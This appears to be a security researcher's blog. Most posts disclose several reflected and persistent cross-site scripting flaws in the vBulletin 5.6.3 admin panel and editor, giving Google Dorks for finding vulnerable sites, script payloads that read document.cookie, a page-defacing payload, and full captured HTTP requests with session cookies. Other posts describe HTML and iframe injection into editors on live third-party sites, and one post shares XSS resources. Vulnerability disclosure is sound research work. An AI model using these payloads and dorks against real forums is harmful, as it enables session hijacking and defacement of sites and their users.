Monday, October 19, 2020

Geoguessr.com - good game for those, who love geography and think.

 

No, I have not looked for bugs on this site. I'm just playing. I want to share this site.
 
 The good game for the brain.
 
You need to determine the exact place of your position on the map.
 


 
 
 
Road signs will help with this. For example the sign "Water!" Where could such a sign be? Where is water needed? Europe or Australia? Africa! 

Also..the language in which the road signs are written
 
 
Or nature. Moss on trees, beautiful northern forest, conifers, flat road, country houses..Sweden or Norway? Wait ... this could be Canada.
 
 .
 



 
 
 
 

Saturday, October 17, 2020

HTML Injection with TinyMCE 5 and other editors. (testing)

I changed my post today.

Reason:

https://www.tiny.cloud/docs/advanced/security/

And i found https://www.blackhat.com/docs/eu-14/materials/eu-14-Javed-Revisiting-XSS-Sanitization-wp.pdf

 By default, iframe and other things is allowed. If you haven't made the settings yet, you can do it.

 

I wrote my question to support and got an answer:

TinyMCE supports adding iframes to content. If you wish to disallow this, you can set


invalid_elements: 'iframe' in the parameters object passed to the tinymce.init function.
 

In a public forum, members of the public can add content, so some defacing is always possible. It's up to the system itself what type of content they allow to be published.

Even if TinyMCE did block the problematic content, there are still ways the user can save problematic content using JS that bypasses TinyMCE. So it's also up to the system to filter or validate content server-side.

If the user is able to insert content into TinyMCE - by pasting, using the UI, or using TinyMCE's JS APIs - and that content causes JS to execute, then we consider that an XSS vulnerability. Outside of that, it's up to the system itself to filter unwanted content.
 


Okay, it was an interesting testing experience. 
 
Instead of pictures and media, you can use a table.


If you saw a simple editor without media, pictures and tables,then you can try use the Post method.

I make test on https://www.project.co/

We can see iframe attacks through the post method (in the discussion) in the project,because ifframe is allowed.



 





 

 

 Html injection video with method Post:



In the Foswiki too.. I was registered as a simple user. I made a page to my profile with a direct link and an iframe site.


Iframe test:


 

Html Code Injection:

 


With the POST method, you can make your post or quote or comment beautiful by using the div tag,change the background. 

<div style="background-image: url(https://ibin.co/5eGCDw8JXCre.gif); height: 1600px; width: 1015px;">

(But with the div tag, sometimes you can change the background of your post without using the Post method. Example: Wordpress)



Add a table or image if it is not in the editor. This sometimes works with the POST method. And yes .. you can add a java script. This also works sometimes. ;)

( If you started working on the bug bounty program (hackerone.com, hackenproof.com and other), then this information can be useful as a method.)

About other editors. With other editors, similar things are also possible. I chose TinyMCE because it is the most famous editor. 



 


Html Code Injection. Change Beatifull Background Quotes on the Invision Power Community IP Board.

This is hack & tricks. But..This is difficult for an simple user, because you will have 2 quotas with method Post (2 quotas it looks ugly ..) and you will not be able to delete one. But if you are a moderator ..

 

I don’t post the tutorial step by step and don’t put any codes here. This video is for informational purposes, as an interesting method with html code injection.

 


 

Tuesday, October 13, 2020

Useful Links. Cross Site Scripting.

Here will be useful links about XSS. Sometimes I will add new links.

1. (Old,but work!)

Owasp

 

2. Cross-site scripting (XSS) cheat sheet.

PostSwigger. 

 

3. Html Security Cheatsheet.

Html5.

 

4. Xssed the best site for examples. 

XSSed.  

 

5.  Bypassing XSS Filters Using Data URIs

 http://cubalo.github.io/

 

6. Online school. Although I use other apps on my smartphone.

W3Schools Online.

 

7.  Html Cheat Sheet list. 

Html tags.  

 

8. XSS Polyglot

Razor blog.  

 

9. Unleashing an Ultimate XSS Polyglot.

 XSS Polyglot.

( But I have my own codes. They are larger in size.)

 

10.  XSS String Encoder.

Encoder. 

 

11.  Firefox Browser Developer Edition.

Firefox. 

(I use simple Mozilla Firefox, but for my test i use 2-3 browsers: Opera, Mozilla and Google Chrome. You need to understand that most users use browser Google Chrome and it would be ideal if xss would work in Google Chrome). 

 

12. Fiddler is a popular web debugging proxy tool that monitor and log the traffic between your computer and the website you are surfing on browsers.

Fiddler.  

 

13. Http Header Live. Displays the HTTP header. Edit it and send it.

Http Header.  

 (I like this addon) 


14. Packetstormsecurity. Good site for information about xss methods. (You can see a different exploits as example.)

Packetstormsecurity.

 

15.  CVE® is a list of entries—each containing an identification number, a
description, and at least one public reference—for publicly known cybersecurity vulnerabilities.

CVE.


 

XSS in SVG files.

Now a largest SMS do not allow upload svg files. But sometimes it can be done.

How to make svg file? It's simple .


Download the file .svg.

 


list of files useful for XSS testing!



About xss scanners.

I don't like the xss scanner. 

I understand ... a port scanner is the good thing, you can't see the ports of another computer with your own eyes without scanner. 

But why do we need a xss scanner ..

A scanner that looks for vulnerable fields does your job.

But what do you do then you? I know. You drink Coca-Cola and wait for the scanner to do your job.

To later say that "I found a bug." But you didn't find him. The scanner found it. You drank coca-cola.

Yes,  it'll save your time. 

But the scanner can't find vert interesting things. The scanner won't give you experience.

What can you do? Throw away the xss-scanner or throw away the computer.

 


Friday, October 9, 2020

Hack and tricks on the Invision IP.Board

Today I will not post about cross site scripting. 

 
I want to show you how you can make your forum profile and comments prettier and better. Without any java script.

But ... I will not post the complete code and I will not write the concept step by step.

What do we have on the forum? A very basic profile. It looks boring.
 
Okay , let's play with http live headers (Firefox) and use method Post. 
 
 
I will make my personal video list and redesign with change background the post. I can resize video or background what i want. 

What is the plus in the hack&tricks things..? You can do whatever you want. Not the way everyone uses it. 
 
The most interesting thing is when you can change something without having admin rights. With the rights of a simple user, not an administrator and not a moderator.
 
 I use for test new demo version and ..test account for profile on Invision Community. 


Let's take a look at the standard ckeditor and what do we see here? We do not see here an opportunity to post a video from YouTube and change the background on the page or in the comments.
 

 
 
Crazy Firefox:)




 
 



 
 
 
 

Saturday, September 5, 2020

vBulletin 5.6.3. Multiple Cross-Site Scripting Vulnerabilities

 https://pentest-vincent.blogspot.com/2020/09/about-exploits.html

# Exploit Title: vBulletin 5.6.3 Multiple cross-site scripting vulnerabilities
# Date: 05.09.2020
# Author: Vincent666 ibn Winnie
# Software Link: https://www.vbulletin.com/en/features/
# Tested on: Windows 10
# Web Browser: Mozilla Firefox & Opera
# Blog : https://pentest-vincent.blogspot.com/
# PoC: https://pentest-vincent.blogspot.com/2020/09/vbulletin-563-cross-site-scripting.html
# Google Dorks: "Powered by vBulletin® Version 5.6.3"

 

1.

 

I use demo version 5.6.3:

 https://www.vbulletin.com/en/vb5-trial/

Go to the "Admin CP" - click on "Styles" - click "Style Manager" - Choose "Denim" or other theme and choose action "Add new template" and click "Go".


Put on the title "1" and template "1" and "Save and Reload". Now you can catch the new URL with HTTP Live Headers or with hands

So..we have Url :


https://469caffdf16a-041586.demo.vbulletin.net/admincp/template.php?templateid=608&group=&expandset=&searchset=&searchstring=&do=edit&windowScrollTop=168&textareaScrollTop=0

Test it with hands and get cross site scripting. Use for tests different browsers. I use Mozilla Firefox and Opera.

https://469caffdf16a-041586.demo.vbulletin.net/admincp/template.php?templateid=1&group=""><script>alert("Cross Site Scripting")</script><script>alert(document.cookie)</script>&expandset=&searchset=&searchstring=&do=edit&windowScrollTop=


Picture:


Video:





Big code for play;)


https://pastebin.com/CV4Yzntu

https://469caffdf16a-041586.demo.vbulletin.net/core/clientscript/codemirror/lib/codemirror.js?v=563
Host: 469caffdf16a-041586.demo.vbulletin.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://469caffdf16a-041586.demo.vbulletin.net/admincp/template.php?templateid=1&group=%22%22%3E%3Cscript%3Ealert(%22Cross%20Site%20Scripting%22)%3C/script%3E&expandset=&searchset=&searchstring=&do=edit&windowScrollTop=
Cookie: vb41586sessionhash=59aae5dd50001c516d71c59cd2043238; vb41586lastvisit=1599290306; vb41586lastactivity=1599294784; PHPSESSID=8a36de42d82550c3b703ff2dfbd2b99ec786b55243861e3b; BIGipServervbdemo-web_POOL=1459677194.20480.0000; vb41586np_notices_displayed=; vb41586cpsession=d16b326f99bd426c0fdd5c6966033ff0; vb41586sitebuilder_active=1; vb41586userstyleid=15

GET: HTTP/1.1 200 OK
Date: Sat, 05 Sep 2020 07:58:41 GMT
Last-Modified: Wed, 26 Aug 2020 18:26:32 GMT
ETag: "47ae7-5adcbf57b0600-gzip"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Cache-Control: max-age=1209600, private
Expires: Sat, 19 Sep 2020 07:58:41 GMT
Content-Type: application/javascript
---------------------

https://469caffdf16a-041586.demo.vbulletin.net/core/clientscript/vbulletin_templatemgr.js?v=563
Host: 469caffdf16a-041586.demo.vbulletin.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://469caffdf16a-041586.demo.vbulletin.net/admincp/template.php?templateid=1&group=%22%22%3E%3Cscript%3Ealert(%22Cross%20Site%20Scripting%22)%3C/script%3E&expandset=&searchset=&searchstring=&do=edit&windowScrollTop=
Cookie: vb41586sessionhash=59aae5dd50001c516d71c59cd2043238; vb41586lastvisit=1599290306; vb41586lastactivity=1599294784; PHPSESSID=8a36de42d82550c3b703ff2dfbd2b99ec786b55243861e3b; BIGipServervbdemo-web_POOL=1459677194.20480.0000; vb41586np_notices_displayed=; vb41586cpsession=d16b326f99bd426c0fdd5c6966033ff0; vb41586sitebuilder_active=1; vb41586userstyleid=15

GET: HTTP/1.1 200 OK
Date: Sat, 05 Sep 2020 07:25:40 GMT
Last-Modified: Wed, 26 Aug 2020 18:26:32 GMT
ETag: "221b-5adcbf57b0600-gzip"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Cache-Control: max-age=1209600, private
Expires: Sat, 19 Sep 2020 07:25:40 GMT
Content-Length: 4076
Content-Type: application/javascript
---------------------



2.

"Admin CP" – "Articles" - "Content List" – open link in new windows (search word “First” and click)


https://469caffdf16a-041586.demo.vbulletin.net/admincp/cms.php?do=contentlist&page=1&perpage=25&tag=default


https://469caffdf16a-041586.demo.vbulletin.net/admincp/cms.php?do=contentlist&page=1&perpage=25&tag=[our XSS is here]


https://469caffdf16a-041586.demo.vbulletin.net/admincp/cms.php?do=contentlist&page=1&perpage=25&tag=""><script>alert("xss")</script>


Picture:



https://imgur.com/a/xL2F5rA



I need to pause with vBulletin.

I see a lot of bugs in the admin panel and I hope the developers will fix this. We are waiting for the new version vBulletin. I like vBulletin more than others forum cms. This is a great cms. 
 
p.s.
 
 I wanted to turn off my computer and go to the bed.
But I thought that maybe in the stylevar.php I will find something. I poured tea and found XSS in 5 minutes.
 
3.  
 
 https://469caffdf16a-041586.demo.vbulletin.net/admincp/stylevar.php
 
 https://469caffdf16a-041586.demo.vbulletin.net/admincp/stylevar.php?do=confirmrevert&dostyleid=15&stylevarid=[cross site scripting is here..]

https://469caffdf16a-041586.demo.vbulletin.net/admincp/stylevar.php?do=confirmrevert&dostyleid=15&stylevarid=%22%22%22%3E%3Cscript%3Ealert(%22vBulletin%205.6.3%20Multiple%20Cross%20Site%20Scripting%22)%3C/script%3E

 

 
 
 
 

 

https://469caffdf16a-041586.demo.vbulletin.net/core/clientscript/vbulletin_stylevars.js?v=563
Host: 469caffdf16a-041586.demo.vbulletin.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://469caffdf16a-041586.demo.vbulletin.net/admincp/stylevar.php?do=confirmrevert&dostyleid=15&stylevarid=%22%22%22%3E%3Cscript%3Ealert(%22vBulletin%205.6.3%20Multiple%20Cross%20Site%20Scripting%22)%3C/script%3E
Cookie: vb41586sessionhash=d06600305ecde6184594af48383373ff; vb41586lastvisit=1599343406; vb41586lastactivity=1599344851; BIGipServervbdemo-web_POOL=1459677194.20480.0000; vb41586cpsession=250b09cd03c73a864836b2fd5cf6392b; PHPSESSID=84aa5ac7477d3368250b4af4be8d779d04852b856d185b8c; vb41586np_notices_displayed=

GET: HTTP/1.1 200 OK
Date: Sat, 05 Sep 2020 22:03:30 GMT
Last-Modified: Wed, 26 Aug 2020 18:26:32 GMT
ETag: "127b-5adcbf57b0600-gzip"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Cache-Control: max-age=1209600, private
Expires: Sat, 19 Sep 2020 22:03:30 GMT
Content-Length: 1385
Content-Type: application/javascript
---------------------

















Wednesday, September 2, 2020

vBulletin 5.6.3 Admin CP Multiple Persistent Cross-Site Scripting Vulnerabilities

 https://pentest-vincent.blogspot.com/2020/09/about-exploits.html

# Exploit Title: vBulletin 5.6.3 Admin CP Multiple Persistent Cross-Site Scripting Vulnerabilities
# Date: 02.09.2020
# Author: Vincent666 ibn Winnie
# Software Link: https://www.vbulletin.com/en/vb5-trial/
# Tested on: Windows 10
# Web Browser: Mozilla Firefox,Opera.
# Blog : https://pentest-vincent.blogspot.com/
# PoC: https://pentest-vincent.blogspot.com/2020/09/vbulletin-563-multiple-persistent-cross.html
# Google Dorks: "Powered by vBulletin® Version 5.6.3"

I found a lot of fields in the Admin CP vBulletin 5.6.3 vulnerable to XSS.

We can see persistent xss in the Admin CP in vBulletin 5.6.3. If a user has access to the admin panel, they can create a new page with an XSS payload as the title.


1. 

Click on "User Profile Fields" and choose "User Profile Field Manager" in the menu. Choose "Occupation" and click on "Edit". Put simple xss code  in the "Title" and "Description" :

""><script>alert("xss")</script>

And save this. Click "Edit" and open:

https://8289cfe4157f-041544.demo.vbulletin.net/admincp/profilefield.php?do=edit&profilefieldid=4

And we can see stored xss in "User Profile Field Manager".

Picture:


https://imgur.com/a/CebQFuT



https://8289cfe4157f-041544.demo.vbulletin.net/admincp/profilefield.php?do=update
Host: 8289cfe4157f-041544.demo.vbulletin.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 716
Origin: https://8289cfe4157f-041544.demo.vbulletin.net
Connection: keep-alive
Referer: https://8289cfe4157f-041544.demo.vbulletin.net/admincp/profilefield.php?do=edit&profilefieldid=4
Cookie: PHPSESSID=66bb49d8a0a0c85337e9f1ff2f477dd2c4c3278731f15b63; BIGipServervbdemo-web_POOL=1459677194.20480.0000; vb41544sessionhash=cabb7c438fad791fd753dd4ac0d63d9c; vb41544lastvisit=1599040629; vb41544lastactivity=1599046274; vb41544np_notices_displayed=; vb41544cpsession=9795d7b732a28c69b2b7cf6b45e633fd; vbulletin_inlinetag=1
Upgrade-Insecure-Requests: 1
s=cabb7c438fad791fd753dd4ac0d63d9c&do=update&adminhash=bcb0ead2d82b59b30a0fbbf87a2481ec&securitytoken=1599048055-ef3a49ab2f51ac32f08056eb9ebd789deab23514&title=Occupation ""><script>alert("xss")</script><script>alert(document.cookie)</script>&description=What's your job?&profilefield[profilefieldcategoryid]=0&profilefield[data]=&profilefield[maxlength]=100&profilefield[size]=25&newtype=input&profilefield[displayorder]=4&profilefield[required]=0&profilefield[editable]=1&profilefield[hidden]=0&profilefield[searchable]=1&profilefield[memberlist]=1&profilefield[showonpost]=0&profilefield[regex]=&type=input&profilefieldid=4
POST: HTTP/1.1 200 OK
Date: Wed, 02 Sep 2020 12:01:15 GMT
X-Frame-Options: sameorigin
Content-Security-Policy: frame-ancestors 'self'
Expires: 0
Cache-Control: private, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Connection: keep-alive, Keep-Alive
Keep-Alive: timeout=2, max=100
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
---------------------

 

2.

Open "Channel Management" - "Channel Manager" - Choose blogs and click "add Announcement". Put xss code in the "Title" and save this.

Open site - blogs page and we can see Persistent XSS.

https://8289cfe4157f-041544.demo.vbulletin.net/blogs




Picture:




https://imgur.com/a/WPHSG1l

Also we can change any channel what you want.(Groups,Forum,Albums,etc.)

Example 2:

https://8289cfe4157f-041544.demo.vbulletin.net/social-groups

Picture:

https://imgur.com/a/9LbO67E


3.

Go to the "User Titles". "Click on User Title Manager". Choose "Junior Member" and click edit (simple example).
 
Put xss code in the Title, save this and come back to "User Title Manager" and we have a persistent xss.

Picture:





https://imgur.com/a/gLOPiwB


4. 

Go to the Style - Styles Manager and Click on Wood (simple example), choose Actions "Edit Style Options- Edit Settings - Go and yes, put xss code in the
Title and save this. We can see Persistent XSS in Styles Manager. 


Video:





Picture:




https://imgur.com/a/7iCKea1



https://8289cfe4157f-041544.demo.vbulletin.net/admincp/template.php?do=updatestyle
Host: 8289cfe4157f-041544.demo.vbulletin.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------270840692812758499333431033827
Content-Length: 1393
Origin: https://8289cfe4157f-041544.demo.vbulletin.net
Connection: keep-alive
Referer: https://8289cfe4157f-041544.demo.vbulletin.net/admincp/template.php?group=&do=editstyle&dostyleid=35
Cookie: PHPSESSID=66bb49d8a0a0c85337e9f1ff2f477dd2c4c3278731f15b63; BIGipServervbdemo-web_POOL=1459677194.20480.0000; vb41544sessionhash=cabb7c438fad791fd753dd4ac0d63d9c; vb41544lastvisit=1599040629; vb41544lastactivity=1599046274; vb41544np_notices_displayed=; vb41544cpsession=9795d7b732a28c69b2b7cf6b45e633fd
Upgrade-Insecure-Requests: 1
s=cabb7c438fad791fd753dd4ac0d63d9c&do=updatestyle&adminhash=bcb0ead2d82b59b30a0fbbf87a2481ec&securitytoken=1599053871-12cb4d6d0b4ccdeb8b01deda904b721ccec94070&title=Wood""><script>alert("Style vulnerable to xss")</script>&userselect=0&displayorder=1&dostyleid=35&oldparentid=34&parentid=34
POST: HTTP/1.1 200 OK
Date: Wed, 02 Sep 2020 13:37:55 GMT
X-Frame-Options: sameorigin
Content-Security-Policy: frame-ancestors 'self'
Expires: 0
Cache-Control: private, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Connection: keep-alive, Keep-Alive
Keep-Alive: timeout=2, max=100
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
---------------------

5. 

Go to the "User Manual" (Help). Choose "Login / Logoff" and click "Add Child Help Item" and in the "Title" put xss code and save this. 



Picture:


6. 
XSS in admincp/search.php?do=dosearch
 
 
https://000ffdcb4b54-041552.demo.vbulletin.net/admincp/search.php?do=dosearch
Host: 000ffdcb4b54-041552.demo.vbulletin.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------196800503716438528872935002711
Content-Length: 888
Origin: https://000ffdcb4b54-041552.demo.vbulletin.net
Connection: keep-alive
Referer: https://000ffdcb4b54-041552.demo.vbulletin.net/admincp/index.php?do=head
Cookie: vb41552sessionhash=8a56db8d216a264c521075efcdec6fbc; vb41552lastvisit=1599073512; vb41552lastactivity=1599073533; PHPSESSID=14c8d2f95e38243fe5111ce9579ad09bf617569f7680008d; BIGipServervbdemo-web_POOL=1459677194.20480.0000; vb41552np_notices_displayed=; vb41552cpsession=23a8f609c662a079aaee64e50f270b24; vb41552password=59098efc90d7f0a3412b019b3cddacffd1570b654367f3bd46d363d0; vb41552userid=2; vb41552sitebuilder_active=1; vb41552userstyleid=23
Upgrade-Insecure-Requests: 1
s=8a56db8d216a264c521075efcdec6fbc&do=dosearch&adminhash=9fd383657a5b776e14cd2f6fc4479618&securitytoken=1599073565-4349b68a14d2331f6e68ec0f182e805f22267460&terms=""><script>alert("xss")</script><script>alert(document.cookie)</script><marquee>Html code injection</marquee><svg/onload=alert("Slash")></svg>
POST: HTTP/1.1 200 OK
Date: Wed, 02 Sep 2020 19:09:56 GMT
X-Frame-Options: sameorigin
Content-Security-Policy: frame-ancestors 'self'
Expires: 0
Cache-Control: private, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Connection: keep-alive, Keep-Alive
Keep-Alive: timeout=2, max=100
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
---------------------

7.

"vBulletin Options" - "Setting Group" - "Paid Subscriptions"-Field "Paid Subscription Email Notification" vulnerable to xss.

picture:
 



https://imgur.com/a/rmbKPaD


https://000ffdcb4b54-041552.demo.vbulletin.net/admincp/options.php?do=options&dogroup=paidsubs&advanced=0

8. "User Rank Manager" vulnerable to xss.

https://000ffdcb4b54-041552.demo.vbulletin.net/admincp/ranks.php?do=modify

Click on "Rank Type" and put xss code in the field "Or if you have a URL enter that".

picture:


https://imgur.com/a/bZigbbi

 

 CVE-2020-25115
CVE-2020-25116
CVE-2020-25117
CVE-2020-25118
CVE-2020-25119
CVE-2020-25120
CVE-2020-25121
CVE-2020-25122
CVE-2020-25123
CVE-2020-25124
 
And all the old bugs in the old version 5.6.2 also work in the new 5.6.3.


 



Tuesday, September 1, 2020

vBulletin 5.6.3 Persistent XSS Image Properties

 

This is problem in the  Ckeditor. And it works not only in the vBulletin and not only with administrator .


# Exploit Title: vBulletin 5.6.3 Persistent XSS Image Properties 
# Date: 01.09.2020
# Author: Vincent666 ibn Winnie
# Software Link: https://www.vbulletin.com/en/vb5-trial/
# Tested on: Windows 10
# Web Browser: Mozilla Firefox,Opera.
# Blog : https://pentest-vincent.blogspot.com/
# PoC: https://pentest-vincent.blogspot.com/2020/09/exploit-title-vbulletin-5.html
# Google Dorks: "Powered by vBulletin® Version 5.6.3"


Click Image Properties in the Pmchat or Topic on the forum and we can see that field "Style"  vulnerable to cross site scripting.

Put xss code in the field and click "post reply". And we have a persistent xss. XSS attack can be use only by the administrator. He will not do this.

Can a user do this? Yes. If the administrator changes the settings.

Settings for change and tests:

Admin CP - Channel Permissions Manager - Edit Registered Users-Can Use HTML - yes. 

And we can see the rule : "Security Risk: Enabling HTML for untrusted users can expose your site to security risks and exploitation".


We found a vulnerable field and tested how it works if we change the security settings. But there may be(?) other ways to exploit this bug.

Example page with Persistent XSS:


https://8289cfe4157f-041544.demo.vbulletin.net/forum/main-forum/82-hello





XSS CODE (i like a big code;)):

""><style>body{visibility:hidden;} html{background-color: Black;}</style><div style="position: absolute;left: 420px;top: 40px;%E2%80%8B%E2%80%8Bz-index: 10;visibility: visible; color: Green; font-size: 40px;"><script>alert("Persistent XSS")</script><script>alert("vBulletin 5.6.3")</script><script>alert("by XSS Maker Vincent ibn Winnie")</script><img src="https://i.gifer.com/Ltvw.gif " style="height: 300px; width: 400px;" alt=".."><br>Cross site scripting is here..;)<br></img><iframe>



https://8289cfe4157f-041544.demo.vbulletin.net/create-content/text/
Host: 8289cfe4157f-041544.demo.vbulletin.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 1855
Origin: https://8289cfe4157f-041544.demo.vbulletin.net
Connection: keep-alive
Referer: https://8289cfe4157f-041544.demo.vbulletin.net/new-content/3
Cookie: PHPSESSID=b1e7fccc193576322852e188279e3c09dbb2c5ca3aa27902; BIGipServervbdemo-web_POOL=1459677194.20480.0000; vb41544sessionhash=837ae139e93de6766093e52cb929818d; vb41544lastvisit=1598971031; vb41544lastactivity=1598971042; vb41544np_notices_displayed=
securitytoken=1598971115-633179a0af862c995f9f9761092aa508c4a44151&iconid=0&title=test1&text=test test test <img alt="efre" class="bbcode-attachment" data-align="none" data-debug="debug__godzilla" data-linktarget="0" data-linktype="0" data-linkurl="" data-size="full" data-tempid="temp_51_1598971305231_517" src="filedata/fetch?filedataid=51&amp;type=full" style="&quot;&quot;&gt;&lt;style&gt;body{visibility:hidden;} html{background-color: Black;}&lt;/style&gt;&lt;div style=&quot;position: absolute;left: 420px;top: 40px;%E2%80%8B%E2%80%8Bz-index: 10;visibility: visible; color: Green; font-size: 40px;&quot;&gt;&lt;script&gt;alert(&quot;Stored XSS&quot;)&lt;/script&gt;&lt;script&gt;alert(&quot;vBulletin 5.6.3&quot;)&lt;/script&gt;&lt;script&gt;alert(&quot;by XSS Maker Vincent ibn Winnie&quot;)&lt;/script&gt;&lt;img src=&quot;https://i.gifer.com/Ltvw.gif &quot; style=&quot;height: 300px; width: 400px;&quot; alt=&quot;..&quot;&gt;&lt;br&gt;Stored XSS&lt;br&gt;&lt;/img&gt;&lt;iframe&gt;" title="grfr" />&files=&filedataids[temp_51_1598971305231_517]=51&filenames[temp_51_1598971305231_517]=xssed_logo.gif&uploadFrom=newContent,newContent&file=,&polloptions[new][]=,,&timeout=&eventstartdate=09/01/2020&is_all_day=1&eventenddate=09/01/2020&ignoredst=1&location=&autocompleteHelper=&tags=,&htmlstate=off&parentid=3&ret=https://8289cfe4157f-041544.demo.vbulletin.net/forum/main-forum
POST: HTTP/1.1 200 OK
Date: Tue, 01 Sep 2020 14:41:49 GMT
X-Frame-Options: sameorigin
Content-Security-Policy: frame-ancestors 'self'
Cache-Control: max-age=0,no-cache,no-store,post-check=0,pre-check=0
Expires: Sat, 1 Jan 2000 01:00:00 GMT
Last-Modified: Tue, 01 Sep 2020 14:41:49 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Connection: keep-alive, Keep-Alive
Content-Length: 112
Keep-Alive: timeout=2, max=100
Content-Type: application/json; charset=UTF-8
---------------------

Geoguessr.com - good game for those, who love geography and think.

  No, I have not looked for bugs on this site. I'm just playing. I want to share this site.    The good game for the brain.   You need...